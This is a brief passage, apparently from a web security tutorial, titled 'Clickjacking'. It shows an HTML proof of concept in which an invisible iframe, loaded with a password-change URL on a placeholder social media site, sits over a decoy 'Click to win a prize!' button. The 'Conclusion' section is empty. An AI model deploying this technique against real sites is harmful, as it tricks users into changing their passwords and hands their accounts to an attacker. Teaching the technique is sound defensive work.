Clickjacking
Clickjacking
html<html>
<head>
<style>
#evilButton {
position: absolute;
top: 50px;
left: 50px;
}
#hiddenIframe {
opacity: 0;
position: absolute;
top: 50px;
left: 50px;
width: 100px;
height: 50px;
}
</style>
</head>
<body>
<button id="evilButton">Click to win a prize!</button>
<iframe id="hiddenIframe" src="http://socialmedia.com/changePassword?newPassword=evilPassword"></iframe>
</body>
</html>Conclusion:
Last updated